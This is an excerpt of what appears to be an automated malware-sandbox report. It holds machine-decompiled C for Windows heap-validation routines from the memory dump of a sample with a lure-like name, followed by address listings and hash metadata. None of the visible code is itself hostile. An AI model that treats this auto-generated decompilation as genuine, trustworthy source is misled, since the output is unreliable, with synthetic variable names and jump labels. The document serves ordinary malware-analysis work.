                                                  						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                  						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                  						__eflags = _t344 & 0x00000001;
                                                  						if((_t344 & 0x00000001) == 0) {
                                                  							L66:
                                                  							_t345 = _a12;
                                                  							 *_a8 =  *_a8 + 1;
                                                  							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                  							__eflags =  *_t345;
                                                  							L67:
                                                  							_t231 =  *(_t415 + 6);
                                                  							if(_t231 == 0) {
                                                  								_t346 = _t414;
                                                  							} else {
                                                  								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                  							}
                                                  							if(_t346 != _t332) {
                                                  								_t232 =  *[fs:0x30];
                                                  								__eflags =  *(_t232 + 0xc);
                                                  								if( *(_t232 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  								}
                                                  								_push( *(_t415 + 6) & 0x000000ff);
                                                  								_push(_t415);
                                                  								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                  								goto L95;
                                                  							} else {
                                                  								if( *((char*)(_t415 + 7)) != 3) {
                                                  									__eflags =  *(_t414 + 0x4c);
                                                  									if( *(_t414 + 0x4c) != 0) {
                                                  										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                  										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                  										__eflags =  *_t415;
                                                  									}
                                                  									_t415 = _t415 + _v28;
                                                  									__eflags = _t415;
                                                  									goto L86;
                                                  								}
                                                  								_t245 =  *(_t415 + 0x1c);
                                                  								if(_t245 == 0) {
                                                  									_t395 =  *_t415 & 0x0000ffff;
                                                  									_v6 = _t395 >> 8;
                                                  									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                  									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                  										__eflags =  *(_t414 + 0x4c);
                                                  										if( *(_t414 + 0x4c) != 0) {
                                                  											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                  											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                  											__eflags =  *_t415;
                                                  										}
                                                  										goto L107;
                                                  									}
                                                  									_t249 =  *[fs:0x30];
                                                  									__eflags =  *(_t249 + 0xc);
                                                  									if( *(_t249 + 0xc) == 0) {
                                                  										_push("HEAP: ");
                                                  										E017AB150();
                                                  									} else {
                                                  										E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  									}
                                                  									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                  									_push(_t415);
                                                  									_push("Heap block at %p is not last block in segment (%p)\n");
                                                  									L95:
                                                  									E017AB150();
                                                  									goto L117;
                                                  								}
                                                  								_v12 = _v12 + 1;
                                                  								_v16 = _v16 + (_t245 >> 0xc);
                                                  								if( *(_t414 + 0x4c) != 0) {
                                                  									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                  									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                  								}
                                                  								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                  								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                  									L82:
                                                  									_v8 = _v8 & 0x00000000;
                                                  									goto L86;
                                                  								} else {
                                                  									if( *(_t414 + 0x4c) != 0) {
                                                  										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                  										 *_t415 = _t397;
                                                  										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                  										_t442 = _t397 >> 0x18 - _t367;
                                                  										if(_t397 >> 0x18 != _t367) {
                                                  											_push(_t367);
                                                  											E0185FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                  										}
                                                  									}
                                                  									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                  										_t259 =  *[fs:0x30];
                                                  										__eflags =  *(_t259 + 0xc);
                                                  										if( *(_t259 + 0xc) == 0) {
                                                  											_push("HEAP: ");
                                                  											E017AB150();
                                                  										} else {
                                                  											E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  										}
                                                  										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                  										_push(_t415);
                                                  										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                  										goto L95;
                                                  									} else {
                                                  										if( *(_t414 + 0x4c) != 0) {
                                                  											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                  											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                  										}
                                                  										goto L82;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						_t281 = _v28 + 0xfffffff0;
                                                  						_v24 = _t281;
                                                  						__eflags = _t390 & 0x00000002;
                                                  						if((_t390 & 0x00000002) != 0) {
                                                  							__eflags = _t281 - 4;
                                                  							if(_t281 > 4) {
                                                  								_t281 = _t281 - 4;
                                                  								__eflags = _t281;
                                                  								_v24 = _t281;
                                                  							}
                                                  						}
                                                  						__eflags = _t390 & 0x00000008;
                                                  						if((_t390 & 0x00000008) == 0) {
                                                  							_t102 = _t415 + 0x10; // -8
                                                  							_t283 = E017FD540(_t102, _t281, 0xfeeefeee);
                                                  							_v20 = _t283;
                                                  							__eflags = _t283 - _v24;
                                                  							if(_t283 != _v24) {
                                                  								_t284 =  *[fs:0x30];
                                                  								__eflags =  *(_t284 + 0xc);
                                                  								if( *(_t284 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  								}
                                                  								_t288 = _v20 + 8 + _t415;
                                                  								__eflags = _t288;
                                                  								_push(_t288);
                                                  								_push(_t415);
                                                  								_push("Free Heap block %p modified at %p after it was freed\n");
                                                  								goto L95;
                                                  							}
                                                  							goto L66;
                                                  						} else {
                                                  							_t374 =  *(_t415 + 8);
                                                  							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                  							_v24 = _t374;
                                                  							_v28 = _t400;
                                                  							_t294 =  *(_t374 + 4);
                                                  							__eflags =  *_t400 - _t294;
                                                  							if( *_t400 != _t294) {
                                                  								L64:
                                                  								_push(_t374);
                                                  								_push( *_t400);
                                                  								_t101 = _t415 + 8; // -16
                                                  								E0186A80D(_t414, 0xd, _t101, _t294);
                                                  								goto L86;
                                                  							}
                                                  							_t56 = _t415 + 8; // -16
                                                  							__eflags =  *_t400 - _t56;
                                                  							_t374 = _v24;
                                                  							if( *_t400 != _t56) {
                                                  								goto L64;
                                                  							}
                                                  							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                  							_t402 =  *(_t414 + 0xb4);
                                                  							__eflags = _t402;
                                                  							if(_t402 == 0) {
                                                  								L35:
                                                  								_t298 = _v28;
                                                  								 *_t298 = _t374;
                                                  								 *(_t374 + 4) = _t298;
                                                  								__eflags =  *(_t415 + 2) & 0x00000008;
                                                  								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                  									L39:
                                                  									_t377 =  *_t415 & 0x0000ffff;
                                                  									_t299 = _t414 + 0xc0;
                                                  									_v28 =  *_t415 & 0x0000ffff;
                                                  									 *(_t415 + 2) = 0;
                                                  									 *((char*)(_t415 + 7)) = 0;
                                                  									__eflags =  *(_t414 + 0xb4);
                                                  									if( *(_t414 + 0xb4) == 0) {
                                                  										_t378 =  *_t299;
                                                  									} else {
                                                  										_t378 = E017CE12C(_t414, _t377);
                                                  										_t299 = _t414 + 0xc0;
                                                  									}
                                                  									__eflags = _t299 - _t378;
                                                  									if(_t299 == _t378) {
                                                  										L51:
                                                  										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                  										__eflags =  *_t300 - _t378;
                                                  										if( *_t300 != _t378) {
                                                  											_push(_t378);
                                                  											_push( *_t300);
                                                  											__eflags = 0;
                                                  											E0186A80D(0, 0xd, _t378, 0);
                                                  										} else {
                                                  											_t87 = _t415 + 8; // -16
                                                  											_t406 = _t87;
                                                  											 *_t406 = _t378;
                                                  											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                  											 *_t300 = _t406;
                                                  											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                  										}
                                                  										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                  										_t405 =  *(_t414 + 0xb4);
                                                  										__eflags = _t405;
                                                  										if(_t405 == 0) {
                                                  											L61:
                                                  											__eflags =  *(_t414 + 0x4c);
                                                  											if(__eflags != 0) {
                                                  												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                  												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                  											}
                                                  											goto L86;
                                                  										} else {
                                                  											_t380 =  *_t415 & 0x0000ffff;
                                                  											while(1) {
                                                  												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                  												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                  													break;
                                                  												}
                                                  												_t307 =  *_t405;
                                                  												__eflags = _t307;
                                                  												if(_t307 == 0) {
                                                  													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                  													L60:
                                                  													_t94 = _t415 + 8; // -16
                                                  													E017CE4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                  													goto L61;
                                                  												}
                                                  												_t405 = _t307;
                                                  											}
                                                  											_t309 = _t380;
                                                  											goto L60;
                                                  										}
                                                  									} else {
                                                  										_t407 =  *(_t414 + 0x4c);
                                                  										while(1) {
                                                  											__eflags = _t407;
                                                  											if(_t407 == 0) {
                                                  												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                  											} else {
                                                  												_t315 =  *(_t378 - 8);
                                                  												_t407 =  *(_t414 + 0x4c);
                                                  												__eflags = _t315 & _t407;
                                                  												if((_t315 & _t407) != 0) {
                                                  													_t315 = _t315 ^  *(_t414 + 0x50);
                                                  													__eflags = _t315;
                                                  												}
                                                  												_t312 = _t315 & 0x0000ffff;
                                                  											}
                                                  											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                  											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                  												goto L51;
                                                  											}
                                                  											_t378 =  *_t378;
                                                  											__eflags = _t414 + 0xc0 - _t378;
                                                  											if(_t414 + 0xc0 != _t378) {
                                                  												continue;
                                                  											}
                                                  											goto L51;
                                                  										}
                                                  										goto L51;
                                                  									}
                                                  								}
                                                  								_t317 = E017CA229(_t414, _t415);
                                                  								__eflags = _t317;
                                                  								if(_t317 != 0) {
                                                  									goto L39;
                                                  								}
                                                  								E017CA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                  								goto L86;
                                                  							}
                                                  							_t385 =  *_t415 & 0x0000ffff;
                                                  							while(1) {
                                                  								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                  								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                  									break;
                                                  								}
                                                  								_t320 =  *_t402;
                                                  								__eflags = _t320;
                                                  								if(_t320 == 0) {
                                                  									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                  									L34:
                                                  									_t63 = _t415 + 8; // -16
                                                  									E017CBC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                  									_t374 = _v24;
                                                  									goto L35;
                                                  								}
                                                  								_t402 = _t320;
                                                  							}
                                                  							_t322 = _t385;
                                                  							goto L34;
                                                  						}
                                                  					}
                                                  					if(_a20 == 0) {
                                                  						L18:
                                                  						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                  							goto L67;
                                                  						}
                                                  						if(E018523E3(_t414, _t415) == 0) {
                                                  							goto L117;
                                                  						}
                                                  						goto L67;
                                                  					} else {
                                                  						if((_t390 & 0x00000002) == 0) {
                                                  							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                  						} else {
                                                  							_t328 = E017A1F5B(_t415);
                                                  							_t342 = _v20;
                                                  							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                  						}
                                                  						_t429 = _t326;
                                                  						if(_t429 == 0) {
                                                  							goto L18;
                                                  						}
                                                  						if(_t429 >= 0) {
                                                  							__eflags = _t326 & 0x00000800;
                                                  							if(__eflags != 0) {
                                                  								goto L18;
                                                  							}
                                                  							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                  							if(__eflags >= 0) {
                                                  								goto L18;
                                                  							}
                                                  							_t412 = _a20;
                                                  							_t327 = _t326 & 0x0000ffff;
                                                  							L17:
                                                  							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                  							goto L18;
                                                  						}
                                                  						_t327 = _t326 & 0x00007fff;
                                                  						if(_t327 >= 0x81) {
                                                  							goto L18;
                                                  						}
                                                  						_t412 = _a24;
                                                  						goto L17;
                                                  					}
                                                  					L86:
                                                  				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                  				_t189 = _v12;
                                                  				goto L88;
                                                  			}
                                                  0x01864ef1
                                                  0x01864ef7
                                                  0x01864efb
                                                  0x01864f1a
                                                  0x01864f1f
                                                  0x01864efd
                                                  0x01864f12
                                                  0x01864f17
                                                  0x01864f2b
                                                  0x01864f2b
                                                  0x01864f2d
                                                  0x01864f2e
                                                  0x01864f2f
                                                  0x00000000
                                                  0x01864f2f
                                                  0x00000000
                                                  0x01864c1d
                                                  0x01864c1d
                                                  0x01864c20
                                                  0x01864c23
                                                  0x01864c26
                                                  0x01864c29
                                                  0x01864c2c
                                                  0x01864c2e
                                                  0x01864d91
                                                  0x01864d91
                                                  0x01864d92
                                                  0x01864d97
                                                  0x01864d9e
                                                  0x00000000
                                                  0x01864d9e
                                                  0x01864c34
                                                  0x01864c37
                                                  0x01864c39
                                                  0x01864c3c
                                                  0x00000000
                                                  0x00000000
                                                  0x01864c45
                                                  0x01864c48
                                                  0x01864c4e
                                                  0x01864c50
                                                  0x01864c78
                                                  0x01864c78
                                                  0x01864c7b
                                                  0x01864c7d
                                                  0x01864c80
                                                  0x01864c84
                                                  0x01864cad
                                                  0x01864cad
                                                  0x01864cb0
                                                  0x01864cb8
                                                  0x01864cbb
                                                  0x01864cbe
                                                  0x01864cc1
                                                  0x01864cc7
                                                  0x01864cdc
                                                  0x01864cc9
                                                  0x01864cd2
                                                  0x01864cd4
                                                  0x01864cd4
                                                  0x01864cde
                                                  0x01864ce0
                                                  0x01864d13
                                                  0x01864d13
                                                  0x01864d16
                                                  0x01864d18
                                                  0x01864d29
                                                  0x01864d2a
                                                  0x01864d2c
                                                  0x01864d34
                                                  0x01864d1a
                                                  0x01864d1a
                                                  0x01864d1a
                                                  0x01864d1d
                                                  0x01864d1f
                                                  0x01864d22
                                                  0x01864d24
                                                  0x01864d24
                                                  0x01864d3c
                                                  0x01864d3f
                                                  0x01864d45
                                                  0x01864d47
                                                  0x01864d6c
                                                  0x01864d6c
                                                  0x01864d70
                                                  0x01864d7e
                                                  0x01864d84
                                                  0x01864d84
                                                  0x00000000
                                                  0x01864d49
                                                  0x01864d49
                                                  0x01864d56
                                                  0x01864d56
                                                  0x01864d59
                                                  0x00000000
                                                  0x00000000
                                                  0x01864d4e
                                                  0x01864d50
                                                  0x01864d52
                                                  0x01864d8e
                                                  0x01864d5d
                                                  0x01864d5f
                                                  0x01864d67
                                                  0x00000000
                                                  0x01864d67
                                                  0x01864d54
                                                  0x01864d54
                                                  0x01864d5b
                                                  0x00000000
                                                  0x01864d5b
                                                  0x01864ce2
                                                  0x01864ce2
                                                  0x01864ce5
                                                  0x01864ce5
                                                  0x01864ce7
                                                  0x01864cfb
                                                  0x01864ce9
                                                  0x01864ce9
                                                  0x01864cec
                                                  0x01864cef
                                                  0x01864cf1
                                                  0x01864cf3
                                                  0x01864cf3
                                                  0x01864cf3
                                                  0x01864cf6
                                                  0x01864cf6
                                                  0x01864d02
                                                  0x01864d05
                                                  0x00000000
                                                  0x00000000
                                                  0x01864d07
                                                  0x01864d0f
                                                  0x01864d11
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01864d11
                                                  0x00000000
                                                  0x01864ce5
                                                  0x01864ce0
                                                  0x01864c8a
                                                  0x01864c8f
                                                  0x01864c91
                                                  0x00000000
                                                  0x00000000
                                                  0x01864c9d
                                                  0x00000000
                                                  0x01864c9d
                                                  0x01864c52
                                                  0x01864c5f
                                                  0x01864c5f
                                                  0x01864c62
                                                  0x00000000
                                                  0x00000000
                                                  0x01864c57
                                                  0x01864c59
                                                  0x01864c5b
                                                  0x01864caa
                                                  0x01864c66
                                                  0x01864c68
                                                  0x01864c70
                                                  0x01864c75
                                                  0x00000000
                                                  0x01864c75
                                                  0x01864c5d
                                                  0x01864c5d
                                                  0x01864c64
                                                  0x00000000
                                                  0x01864c64
                                                  0x01864c17
                                                  0x01864b75
                                                  0x01864bc4
                                                  0x01864bc8
                                                  0x00000000
                                                  0x00000000
                                                  0x01864bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01864b77
                                                  0x01864b7a
                                                  0x01864b8c
                                                  0x01864b7c
                                                  0x01864b7e
                                                  0x01864b83
                                                  0x01864b86
                                                  0x01864b86
                                                  0x01864b90
                                                  0x01864b93
                                                  0x00000000
                                                  0x00000000
                                                  0x01864b95
                                                  0x01864bab
                                                  0x01864bb0
                                                  0x00000000
                                                  0x00000000
                                                  0x01864bb2
                                                  0x01864bb9
                                                  0x00000000
                                                  0x00000000
                                                  0x01864bbb
                                                  0x01864bbe
                                                  0x01864bc1
                                                  0x01864bc1
                                                  0x00000000
                                                  0x01864bc1
                                                  0x01864b97
                                                  0x01864ba4
                                                  0x00000000
                                                  0x00000000
                                                  0x01864ba6
                                                  0x00000000
                                                  0x01864ba6
                                                  0x01864ea9
                                                  0x01864ea9
                                                  0x01864eb2
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                  • API String ID: 0-3591852110
                                                  • Opcode ID: e828764a211f0ca3c048cf6409b868bb3a65dfe16ce4a81dd03b57e0ff534d1b
                                                  • Instruction ID: ee822b81b2ecba2472eadd9b1d5136f89a94bb5fa146fb5ecd27f58e79feaf1b
                                                  • Opcode Fuzzy Hash: e828764a211f0ca3c048cf6409b868bb3a65dfe16ce4a81dd03b57e0ff534d1b
                                                  • Instruction Fuzzy Hash: 7312FC70600646EFDB29CF69C498BBAFBE9FF48314F148559E486CB641D734EA80CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 56%
                                                  			E01864496(signed int* __ecx, void* __edx) {
                                                  				signed int _v5;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed char _v24;
                                                  				signed int* _v28;
                                                  				char _v32;
                                                  				signed int* _v36;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t150;
                                                  				intOrPtr _t151;
                                                  				signed char _t156;
                                                  				intOrPtr _t157;
                                                  				unsigned int _t169;
                                                  				intOrPtr _t170;
                                                  				signed int* _t183;
                                                  				signed char _t184;
                                                  				intOrPtr _t191;
                                                  				signed int _t201;
                                                  				intOrPtr _t203;
                                                  				intOrPtr _t212;
                                                  				intOrPtr _t220;
                                                  				signed int _t230;
                                                  				signed int _t241;
                                                  				signed int _t244;
                                                  				void* _t259;
                                                  				signed int _t260;
                                                  				signed int* _t261;
                                                  				intOrPtr* _t262;
                                                  				signed int _t263;
                                                  				signed int* _t264;
                                                  				signed int _t267;
                                                  				signed int* _t268;
                                                  				void* _t270;
                                                  				void* _t281;
                                                  				signed short _t285;
                                                  				signed short _t289;
                                                  				signed int _t291;
                                                  				signed int _t298;
                                                  				signed char _t303;
                                                  				signed char _t308;
                                                  				signed int _t314;
                                                  				intOrPtr _t317;
                                                  				unsigned int _t319;
                                                  				signed int* _t325;
                                                  				signed int _t326;
                                                  				signed int _t327;
                                                  				intOrPtr _t328;
                                                  				signed int _t329;
                                                  				signed int _t330;
                                                  				signed int* _t331;
                                                  				signed int _t332;
                                                  				signed int _t350;
                                                  
                                                  				_t259 = __edx;
                                                  				_t331 = __ecx;
                                                  				_v28 = __ecx;
                                                  				_v20 = 0;
                                                  				_v12 = 0;
                                                  				_t150 = E018649A4(__ecx);
                                                  				_t267 = 1;
                                                  				if(_t150 == 0) {
                                                  					L61:
                                                  					_t151 =  *[fs:0x30];
                                                  					__eflags =  *((char*)(_t151 + 2));
                                                  					if( *((char*)(_t151 + 2)) != 0) {
                                                  						 *0x1896378 = _t267;
                                                  						asm("int3");
                                                  						 *0x1896378 = 0;
                                                  					}
                                                  					__eflags = _v12;
                                                  					if(_v12 != 0) {
                                                  						_t105 =  &_v16;
                                                  						 *_t105 = _v16 & 0x00000000;
                                                  						__eflags =  *_t105;
                                                  						E017D174B( &_v12,  &_v16, 0x8000);
                                                  					}
                                                  					L65:
                                                  					__eflags = 0;
                                                  					return 0;
                                                  				}
                                                  				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                  					_t268 =  &(_t331[0x30]);
                                                  					_v32 = 0;
                                                  					_t260 =  *_t268;
                                                  					_t308 = 0;
                                                  					_v24 = 0;
                                                  					while(_t268 != _t260) {
                                                  						_t260 =  *_t260;
                                                  						_v16 =  *_t325 & 0x0000ffff;
                                                  						_t156 = _t325[0];
                                                  						_v28 = _t325;
                                                  						_v5 = _t156;
                                                  						__eflags = _t156 & 0x00000001;
                                                  						if((_t156 & 0x00000001) != 0) {
                                                  							_t157 =  *[fs:0x30];
                                                  							__eflags =  *(_t157 + 0xc);
                                                  							if( *(_t157 + 0xc) == 0) {
                                                  								_push("HEAP: ");
                                                  								E017AB150();
                                                  							} else {
                                                  								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  							}
                                                  							_push(_t325);
                                                  							E017AB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                  							L32:
                                                  							_t270 = 0;
                                                  							__eflags = _t331[0x13];
                                                  							if(_t331[0x13] != 0) {
                                                  								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                  								 *_t325 =  *_t325 ^ _t331[0x14];
                                                  							}
                                                  							L60:
                                                  							_t267 = _t270 + 1;
                                                  							__eflags = _t267;
                                                  							goto L61;
                                                  						}
                                                  						_t169 =  *_t325 & 0x0000ffff;
                                                  						__eflags = _t169 - _t308;
                                                  						if(_t169 < _t308) {
                                                  							_t170 =  *[fs:0x30];
                                                  							__eflags =  *(_t170 + 0xc);
                                                  							if( *(_t170 + 0xc) == 0) {
                                                  								_push("HEAP: ");
                                                  								E017AB150();
                                                  							} else {
                                                  								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  							}
                                                  							E017AB150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                  							goto L32;
                                                  						} else {
                                                  							__eflags = _t331[0x13];
                                                  							_t308 = _t169;
                                                  							_v24 = _t308;
                                                  							if(_t331[0x13] != 0) {
                                                  								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                  								 *_t325 =  *_t325 ^ _t331[0x14];
                                                  								__eflags =  *_t325;
                                                  							}
                                                  							_t26 =  &_v32;
                                                  							 *_t26 = _v32 + 1;
                                                  							__eflags =  *_t26;
                                                  							continue;
                                                  						}
                                                  					}
                                                  					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                  					if( *0x1896350 != 0 && _t331[0x2f] != 0) {
                                                  						_push(4);
                                                  						_push(0x1000);
                                                  						_push( &_v16);
                                                  						_push(0);
                                                  						_push( &_v12);
                                                  						_push(0xffffffff);
                                                  						if(E017E9660() >= 0) {
                                                  							_v20 = _v12 + 0x204;
                                                  						}
                                                  					}
                                                  					_t183 =  &(_t331[0x27]);
                                                  					_t281 = 0x81;
                                                  					_t326 =  *_t183;
                                                  					if(_t183 == _t326) {
                                                  						L49:
                                                  						_t261 =  &(_t331[0x29]);
                                                  						_t184 = 0;
                                                  						_t327 =  *_t261;
                                                  						_t282 = 0;
                                                  						_v24 = 0;
                                                  						_v36 = 0;
                                                  						__eflags = _t327 - _t261;
                                                  						if(_t327 == _t261) {
                                                  							L53:
                                                  							_t328 = _v32;
                                                  							_v28 = _t331;
                                                  							__eflags = _t328 - _t184;
                                                  							if(_t328 == _t184) {
                                                  								__eflags = _t331[0x1d] - _t282;
                                                  								if(_t331[0x1d] == _t282) {
                                                  									__eflags = _v12;
                                                  									if(_v12 == 0) {
                                                  										L82:
                                                  										_t267 = 1;
                                                  										__eflags = 1;
                                                  										goto L83;
                                                  									}
                                                  									_t329 = _t331[0x2f];
                                                  									__eflags = _t329;
                                                  									if(_t329 == 0) {
                                                  										L77:
                                                  										_t330 = _t331[0x22];
                                                  										__eflags = _t330;
                                                  										if(_t330 == 0) {
                                                  											L81:
                                                  											_t129 =  &_v16;
                                                  											 *_t129 = _v16 & 0x00000000;
                                                  											__eflags =  *_t129;
                                                  											E017D174B( &_v12,  &_v16, 0x8000);
                                                  											goto L82;
                                                  										}
                                                  										_t314 = _t331[0x21] & 0x0000ffff;
                                                  										_t285 = 1;
                                                  										__eflags = 1 - _t314;
                                                  										if(1 >= _t314) {
                                                  											goto L81;
                                                  										} else {
                                                  											goto L79;
                                                  										}
                                                  										while(1) {
                                                  											L79:
                                                  											_t330 = _t330 + 0x40;
                                                  											_t332 = _t285 & 0x0000ffff;
                                                  											_t262 = _v20 + _t332 * 4;
                                                  											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                  											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                  												break;
                                                  											}
                                                  											_t285 = _t285 + 1;
                                                  											__eflags = _t285 - _t314;
                                                  											if(_t285 < _t314) {
                                                  												continue;
                                                  											}
                                                  											goto L81;
                                                  										}
                                                  										_t191 =  *[fs:0x30];
                                                  										__eflags =  *(_t191 + 0xc);
                                                  										if( *(_t191 + 0xc) == 0) {
                                                  											_push("HEAP: ");
                                                  											E017AB150();
                                                  										} else {
                                                  											E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  										}
                                                  										_push(_t262);
                                                  										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                  										_t148 = _t330 + 0x10; // 0x10
                                                  										_push( *((intOrPtr*)(_t330 + 8)));
                                                  										E017AB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                  										L59:
                                                  										_t270 = 0;
                                                  										__eflags = 0;
                                                  										goto L60;
                                                  									}
                                                  									_t289 = 1;
                                                  									__eflags = 1;
                                                  									while(1) {
                                                  										_t201 = _v12;
                                                  										_t329 = _t329 + 0xc;
                                                  										_t263 = _t289 & 0x0000ffff;
                                                  										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                  										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                  											break;
                                                  										}
                                                  										_t289 = _t289 + 1;
                                                  										__eflags = _t289 - 0x81;
                                                  										if(_t289 < 0x81) {
                                                  											continue;
                                                  										}
                                                  										goto L77;
                                                  									}
                                                  									_t203 =  *[fs:0x30];
                                                  									__eflags =  *(_t203 + 0xc);
                                                  									if( *(_t203 + 0xc) == 0) {
                                                  										_push("HEAP: ");
                                                  										E017AB150();
                                                  									} else {
                                                  										E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  									}
                                                  									_t291 = _v12;
                                                  									_push(_t291 + _t263 * 4);
                                                  									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                  									_push( *((intOrPtr*)(_t329 + 8)));
                                                  									E017AB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                  									goto L59;
                                                  								}
